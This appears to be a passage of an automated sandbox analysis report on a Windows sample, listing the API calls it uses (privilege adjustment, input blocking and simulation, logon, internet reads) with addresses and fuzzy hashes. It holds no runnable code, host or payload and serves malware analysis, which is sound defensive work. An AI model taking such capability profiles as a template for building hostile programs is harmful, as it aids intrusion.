                                                              • Opcode Fuzzy Hash: 86de983dc4324a474d096157c34e84041ed7b78eb4d9ff5d0baa1254674aab90
                                                              • Instruction Fuzzy Hash: E7927E71E0021ACBDF24CF58C8807FEB7B5FB54314F2481AAE916AB286D7719D81DB91
                                                              APIs
                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,00ACE014,774D0AE0,00ACDEF1,00B4DC38,?,?), ref: 00ACE02C
                                                              • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00ACE03E
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProc
                                                              • String ID: GetNativeSystemInfo$kernel32.dll
                                                              • API String ID: 2574300362-192647395
                                                              • Opcode ID: 0864def3b87b693710ebaeca10ac4583f5574b4b02f2926dc8f3ba9fb2387645
                                                              • Instruction ID: 8768e830b7b8e2e71193e3850177a13ffda7f5cf5b42a5754d3516c69f9fdff2
                                                              • Opcode Fuzzy Hash: 0864def3b87b693710ebaeca10ac4583f5574b4b02f2926dc8f3ba9fb2387645
                                                              • Instruction Fuzzy Hash: F7D0C770540F129FD7359F65FC08B5676D4AB04711F29446EE495E3160DFB8D8808A90
                                                              APIs
                                                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00AF13DC
                                                              Similarity
                                                              • API ID: lstrlen
                                                              • String ID: ($|
                                                              • API String ID: 1659193697-1631851259
                                                              • Opcode ID: 9a700f9c22400b15bd6f323b1f149919b39484617cff19c254d1ed8a917c56dc
                                                              • Instruction ID: fe5e1a8ab0db20c5283c59f1e65d97822f0fbd5304cb6a10f28a06159d425de5
                                                              • Opcode Fuzzy Hash: 9a700f9c22400b15bd6f323b1f149919b39484617cff19c254d1ed8a917c56dc
                                                              • Instruction Fuzzy Hash: 1A3214B5A00605DFC728CF69C480A6AB7F0FF48320B55C56EE59ADB3A1E770E941CB44
                                                              APIs
                                                                • Part of subcall function 00ACB34E: GetWindowLongW.USER32(?,000000EB), ref: 00ACB35F
                                                              • DefDlgProcW.USER32(?,?,?,?,?), ref: 00ACB22F
                                                                • Part of subcall function 00ACB55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00ACB5A5
                                                              Similarity
                                                              • API ID: Proc$LongWindow
                                                              • String ID:
                                                              • API String ID: 2749884682-0
                                                              • Opcode ID: fd762ddb3ae6967567bd1343c90311f090642a4e579262ab93e7c7604429ea10
                                                              • Instruction ID: e60383f44d29ef497d023deef760996fa34d712989c9609360ac2767a1a1cbbb
                                                              • Opcode Fuzzy Hash: fd762ddb3ae6967567bd1343c90311f090642a4e579262ab93e7c7604429ea10
                                                              • Instruction Fuzzy Hash: D4A15470134015BADA28AB2E6C8AFFF39ACEB52344F56415DF41AD6692CF26DC00D672
                                                              APIs
                                                              • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00B043BF,00000000), ref: 00B04FA6
                                                              • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00B04FD2
                                                              Similarity
                                                              • API ID: Internet$AvailableDataFileQueryRead
                                                              • String ID:
                                                              • API String ID: 599397726-0
                                                              • Opcode ID: 34e957e8d26c424a2bd635ce7a639777c08b0adda15accdd5d9aa88a65a77c30
                                                              • Instruction ID: 37ece86d263783ccc51e9f406138d20cf8ef0b7d32623abc400b951d034c764e
                                                              • Opcode Fuzzy Hash: 34e957e8d26c424a2bd635ce7a639777c08b0adda15accdd5d9aa88a65a77c30
                                                              • Instruction Fuzzy Hash: 9141C7B150420ABFEB219E94DD81EBF7BFCEB40754F1040AEF705661C0EB719E419AA0
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000001), ref: 00AFE20D
                                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00AFE267
                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00AFE2B4
                                                              Similarity
                                                              • API ID: ErrorMode$DiskFreeSpace
                                                              • String ID:
                                                              • API String ID: 1682464887-0
                                                              • Opcode ID: 7dbcf73e50ed5d281907b71a5be3f68774306bc974757106a504a4f79ac41e93
                                                              • Instruction ID: 85980aee3bfb60342de59217796aaebee56ecfd3494a768f2940fbb74db10868
                                                              • Opcode Fuzzy Hash: 7dbcf73e50ed5d281907b71a5be3f68774306bc974757106a504a4f79ac41e93
                                                              • Instruction Fuzzy Hash: BC213A35A00618EFCB00EFA5D985EEEFBB8FF48310F1484AAE945AB251DB319915CB50
                                                              APIs
                                                                • Part of subcall function 00ACF4EA: std::exception::exception.LIBCMT ref: 00ACF51E
                                                                • Part of subcall function 00ACF4EA: __CxxThrowException@8.LIBCMT ref: 00ACF533
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00AEB180
                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00AEB1AD
                                                              • GetLastError.KERNEL32 ref: 00AEB1BA
                                                              Similarity
                                                              • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                              • String ID:
                                                              • API String ID: 1922334811-0
                                                              • Opcode ID: e044a21d72f9252ac5a41690b146d76d57b9dfb523d602a6f60e3f12bcc6603e
                                                              • Instruction ID: c343956d4c1aa11043262dc951abf18784d2a5a9acbc0ed06a706265b44c6e4f
                                                              • Opcode Fuzzy Hash: e044a21d72f9252ac5a41690b146d76d57b9dfb523d602a6f60e3f12bcc6603e
                                                              • Instruction Fuzzy Hash: 4E11CEB2514204AFE718AF65EDC9D6BB7BDFB44720B20852EE05693240DB70FC418A60
                                                              APIs
                                                              • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00AF66AF
                                                              • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 00AF66EC
                                                              • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00AF66F5
                                                              Similarity
                                                              • API ID: CloseControlCreateDeviceFileHandle
                                                              • String ID:
                                                              • API String ID: 33631002-0
                                                              • Opcode ID: 5b25de9e15431001d96e965e6011da3c37c3553bad9fdea47ed49d4041108e0b
                                                              • Instruction ID: 0dbad55bab9c8e8f6957212b72f49607d54b344ffb1bfd29a701a38284b449fe
                                                              • Opcode Fuzzy Hash: 5b25de9e15431001d96e965e6011da3c37c3553bad9fdea47ed49d4041108e0b
                                                              • Instruction Fuzzy Hash: 961182B1900228BEE7109BA8DC45FBFB7BCEB04714F104555FA01E7190C3749E0487A5
                                                              APIs
                                                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00AF7223
                                                              • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00AF723A
                                                              • FreeSid.ADVAPI32(?), ref: 00AF724A
                                                              Similarity
                                                              • API ID: AllocateCheckFreeInitializeMembershipToken
                                                              • String ID:
                                                              • API String ID: 3429775523-0
                                                              • Opcode ID: 5aff58cc77586ea71a29dbdb8f0557debc020546fd04c2f8d81261d56a820cb2
                                                              • Instruction ID: 34e3f9fb6df3110c99986c2a6c4814ad5fbaa19074af4277ab5a3ca1aa452853
                                                              • Opcode Fuzzy Hash: 5aff58cc77586ea71a29dbdb8f0557debc020546fd04c2f8d81261d56a820cb2
                                                              • Instruction Fuzzy Hash: EDF01776A14209BFDF04DFF4DD99AEEBBB8EF08601F104869A602E3191E6709A448B10
                                                              APIs
                                                              • FindFirstFileW.KERNEL32(?,?), ref: 00AFF599
                                                              • FindClose.KERNEL32(00000000), ref: 00AFF5C9
                                                              Similarity
                                                              • API ID: Find$CloseFileFirst
                                                              • String ID:
                                                              • API String ID: 2295610775-0
                                                              • Opcode ID: a7a46f13b1fdbc46a60dad8a7405ed29d57e3df52e97d8937520f72bde37bef9
                                                              • Instruction ID: 34f893e3fdb025c382cb1563217310c55cd6b58b0d1b2ef00b3e7f0a2d8b877d
                                                              • Opcode Fuzzy Hash: a7a46f13b1fdbc46a60dad8a7405ed29d57e3df52e97d8937520f72bde37bef9
                                                              • Instruction Fuzzy Hash: DD11AD326046049FD710EF68D845A2EF3E8FF84324F008A1EF9A9DB291CF30AD008B81
                                                              APIs
                                                              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00B0BE6A,?,?,00000000,?), ref: 00AFCEA7
                                                              • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00B0BE6A,?,?,00000000,?), ref: 00AFCEB9
                                                              Similarity
                                                              • API ID: ErrorFormatLastMessage
                                                              • String ID:
                                                              • API String ID: 3479602957-0
                                                              • Opcode ID: f1b42226fbaa733629909fcbc0d0855a4d4d2cdfbd6ac45989315818dfc86fd8
                                                              • Instruction ID: 660cadf4cbba1fc6bdeb292fc32e8f4bd83fb948249fd579cc3cc15e1e92c0f6
                                                              • Opcode Fuzzy Hash: f1b42226fbaa733629909fcbc0d0855a4d4d2cdfbd6ac45989315818dfc86fd8
                                                              • Instruction Fuzzy Hash: 53F0823510022DEBDB10ABA5DC49FFE776DBF08361F004166F915D7182D630DA50CBA1
                                                              APIs
                                                              • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00AF4153
                                                              • keybd_event.USER32(?,7707C0D0,?,00000000), ref: 00AF4166
                                                              Similarity
                                                              • API ID: InputSendkeybd_event
                                                              • String ID:
                                                              • API String ID: 3536248340-0
                                                              • Opcode ID: 4da5f5bb12a61d2e15ce8e94469030ae4613c795d7a91292b8c4360ff5e32617
                                                              • Instruction ID: 2476ef264aecc3268b454dbd7de9ec837750e1f3f5c376d7b946831d5f9fff9d
                                                              • Opcode Fuzzy Hash: 4da5f5bb12a61d2e15ce8e94469030ae4613c795d7a91292b8c4360ff5e32617
                                                              • Instruction Fuzzy Hash: 16F0677080024DAFEB058FA0C805BBEBBB0EF14305F00800AFA66A6192D77986169FA4
                                                              APIs
                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00AEACC0), ref: 00AEAB99
                                                              • CloseHandle.KERNEL32(?,?,00AEACC0), ref: 00AEABAB
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: AdjustCloseHandlePrivilegesToken
                                                              • String ID:
                                                              • API String ID: 81990902-0
                                                              • Opcode ID: 1a339370d5046b161a8abaf8bbc5720dd4ce3258b56e8213b4b8cbec60c96d0c
                                                              • Instruction ID: 1ccc3b12dcd3121f9ff4174b3a74e13ad92e8a1de8ce3dd6f242c6ea5ea591dc
                                                              • Opcode Fuzzy Hash: 1a339370d5046b161a8abaf8bbc5720dd4ce3258b56e8213b4b8cbec60c96d0c
                                                              • Instruction Fuzzy Hash: EFE0E671004510AFEB252F55FD05DB777EAEF04320721882DF55A81470DB736C90DB50
                                                              APIs
                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00AD6DB3,-0000031A,?,?,00000001), ref: 00AD81B1
                                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00AD81BA
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled
                                                              • String ID:
                                                              • API String ID: 3192549508-0
                                                              • Opcode ID: 57de3064a956d4be3e856000b2bd1b60e6fb0ce297416e2581f0a61011253702
                                                              • Instruction ID: 7316702227e70731ade87276c2a4c732e4850c3b153cda391a2a0bbbd4f384ba
                                                              • Opcode Fuzzy Hash: 57de3064a956d4be3e856000b2bd1b60e6fb0ce297416e2581f0a61011253702
                                                              • Instruction Fuzzy Hash: F4B09231144608ABDB002BA1FC09B9C7F68EB08652F204010F60D460618F7268208A9A
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: _memmove
                                                              • String ID:
                                                              • API String ID: 4104443479-0
                                                              • Opcode ID: dc889d8d38e423f5409fda2d29b0737e14574fe600e1da66c90ec0b00c1a9243
                                                              • Instruction ID: 4c479c5895752754715ef46d63c1e1e7c798b688e4613a57f0d8881fcd94a19a
                                                              • Opcode Fuzzy Hash: dc889d8d38e423f5409fda2d29b0737e14574fe600e1da66c90ec0b00c1a9243
                                                              • Instruction Fuzzy Hash: 8FA23774A04219CFDB24CF58C8806EDBBB5FF88314F2581A9E859AB391D7749E81DF90
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: _memmove
                                                              • String ID:
                                                              • API String ID: 4104443479-0
                                                              • Opcode ID: f9bcc8b98b1307d9dbab1fca11eec4843f071fbac5c347923985e445179b58ab
                                                              • Instruction ID: bcad5ad9753d276b995ffc7bc626555fa9949cc2e2c7806386f5227efb8bb58c
                                                              • Opcode Fuzzy Hash: f9bcc8b98b1307d9dbab1fca11eec4843f071fbac5c347923985e445179b58ab
                                                              • Instruction Fuzzy Hash: 3D727975A00219DFCF24CF58C4806EDBBF6FF88314F2586AAD855AB251D774AE81CB90
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3686e15ee7a1da3be2d25cefaa3403841510346fe42f379c0799f61ed8ce95a6
                                                              • Instruction ID: aab6b9a0a57d7e0f1454bfeaf9f64f419571b951f5868c2488c7107fb9262348
                                                              • Opcode Fuzzy Hash: 3686e15ee7a1da3be2d25cefaa3403841510346fe42f379c0799f61ed8ce95a6
                                                              • Instruction Fuzzy Hash: 43322631D69F014DD7235638C822339A298AFB73C4F55D727F81AB6EA6EF29C9835100
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: __itow__swprintf
                                                              • String ID:
                                                              • API String ID: 674341424-0
                                                              • Opcode ID: 456a00a93af13294236b76aaebedeccbb6d24a9b373b4deabed0b7342cbe872e
                                                              • Instruction ID: 0b4792e8f2ed06cff43b76bd09859f5af351d5f11ca25cf2de3d89f6a44a6d91
                                                              • Opcode Fuzzy Hash: 456a00a93af13294236b76aaebedeccbb6d24a9b373b4deabed0b7342cbe872e
                                                              • Instruction Fuzzy Hash: E8228B716083119FD724DF24C991BAFBBE8EF84310F10491DF99A9B292DB71E945CB82
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 34e7d58ff1712277d3a9e5760ef629c559f5cd80b3d73caf23dd0660c39f8b92
                                                              • Instruction ID: 15d83d7e726c9553ed5be6beae363b1f352551a914fd5a8dd8caadbc7efad4b7
                                                              • Opcode Fuzzy Hash: 34e7d58ff1712277d3a9e5760ef629c559f5cd80b3d73caf23dd0660c39f8b92
                                                              • Instruction Fuzzy Hash: 0BB1E224D2AF414ED72396398831336B65CBFBB2D5F91D71BFC1A75E62EB2186834180
                                                              APIs
                                                              • __time64.LIBCMT ref: 00AFB6DF
                                                                • Part of subcall function 00AD344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00AFBDC3,00000000,?,?,?,?,00AFBF70,00000000,?), ref: 00AD3453
                                                                • Part of subcall function 00AD344A: __aulldiv.LIBCMT ref: 00AD3473
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: Time$FileSystem__aulldiv__time64
                                                              • String ID:
                                                              • API String ID: 2893107130-0
                                                              • Opcode ID: 9a4e6877867015273d790b47e55b46dd6298b95b84bdd2baa550af80c427ef0c
                                                              • Instruction ID: 3faa71ce3e4f8529703813229436b8aa64115df12aa1281d77c925d745d72a7c
                                                              • Opcode Fuzzy Hash: 9a4e6877867015273d790b47e55b46dd6298b95b84bdd2baa550af80c427ef0c
                                                              • Instruction Fuzzy Hash: 052172726345108BC729CF68C881A62B7E1EB95710B258E6DE4E5CB2C0CB78B945DB54
                                                              APIs
                                                              • BlockInput.USER32(00000001), ref: 00B06ACA
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: BlockInput
                                                              • String ID:
                                                              • API String ID: 3456056419-0
                                                              • Opcode ID: 0427fcd6915a0b086ee5d7ee2a2eb04c9876e53c5efae54ab43df23ff455b938
                                                              • Instruction ID: f22ae5a95b10a776e670eaa4a9e1fc0daed922337299729faed0fc9f6e982962
                                                              • Opcode Fuzzy Hash: 0427fcd6915a0b086ee5d7ee2a2eb04c9876e53c5efae54ab43df23ff455b938
                                                              • Instruction Fuzzy Hash: BEE012353002046FC700EB69D505E9ABBECAF64761B048456E945D72A1DAB0E8048B90
                                                              APIs
                                                              • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00AF74DE
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: mouse_event
                                                              • String ID:
                                                              • API String ID: 2434400541-0
                                                              • Opcode ID: a70025935f12a5127a9ff0d7e7837f641ac1b2fe952ac057e7b98bd764ac630d
                                                              • Instruction ID: 2b3381fed5d8414fc32158e76e8b707618276e55ff5944d57f11f96299739a68
                                                              • Opcode Fuzzy Hash: a70025935f12a5127a9ff0d7e7837f641ac1b2fe952ac057e7b98bd764ac630d
                                                              • Instruction Fuzzy Hash: 9ED09EA566C70D79ED2987A49C1FF7E1919F3007C3F949189B782CA4C1B89068459132
                                                              APIs
                                                              • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00AEAD3E), ref: 00AEB124
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: LogonUser
                                                              • String ID:
                                                              • API String ID: 1244722697-0
                                                              • Opcode ID: a560cfb4c9543ede454ec6d700f1af39e6cb72a350ec8de1b8d7a087e237c3e6
                                                              • Instruction ID: 7de5cc01549a5ba7d9c2325d3acf3d1727caae872cdf9f1dd2f93409e46e2111
                                                              • Opcode Fuzzy Hash: a560cfb4c9543ede454ec6d700f1af39e6cb72a350ec8de1b8d7a087e237c3e6
                                                              • Instruction Fuzzy Hash: C0D05E320A460EBEDF024FA4EC02EAE3F6AEB04B00F408110FA11C60A0C771D531AB50
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: NameUser
                                                              • String ID:
                                                              • API String ID: 2645101109-0
                                                              • Opcode ID: 709183b78427789237e77f75176d3600ee07a071337635cf71fb54900eaa0fd0
                                                              • Instruction ID: ebc4b9ca82f9e35099edc49aad07d7d9fea7018593a1822fee546aff11fd768c
                                                              • Opcode Fuzzy Hash: 709183b78427789237e77f75176d3600ee07a071337635cf71fb54900eaa0fd0
                                                              • Instruction Fuzzy Hash: 0CC04CB1400119DFC755DBC0DD849EEB7BCAB04701F204191A105F2110DB709B459B72
                                                              APIs
                                                              • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00AD818F
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303387442.0000000000B6A000.00000004.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303403811.0000000000B74000.00000002.00000001.01000000.00000004.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_ab0000_VSP469620.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled
                                                              • String ID:
                                                              • API String ID: 3192549508-0
                                                              • Opcode ID: 24f4b2e7b0a4c7fd0021c9cacd084f9b5eed09bfe0db11b35f0b864b1d78149b
                                                              • Instruction ID: b9270b484dbe80be27b788d025cf2fd0a6d174c8cd9f163d18f5b20362228d7f
                                                              • Opcode Fuzzy Hash: 24f4b2e7b0a4c7fd0021c9cacd084f9b5eed09bfe0db11b35f0b864b1d78149b
                                                              • Instruction Fuzzy Hash: 65A0113000020CAB8F002B82FC088883F2CEA002A0B200020F80C020208B22A8208A8A
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.1303287520.0000000000AB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AB0000, based on PE: true
                                                               • Associated: 00000002.00000002.1303271525.0000000000AB0000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B3D000.00000002.00000001.01000000.00000004.sdmp
                                                               • Associated: 00000002.00000002.1303347203.0000000000B5E000.00000002.00000001.01000000.00000004.sdmp
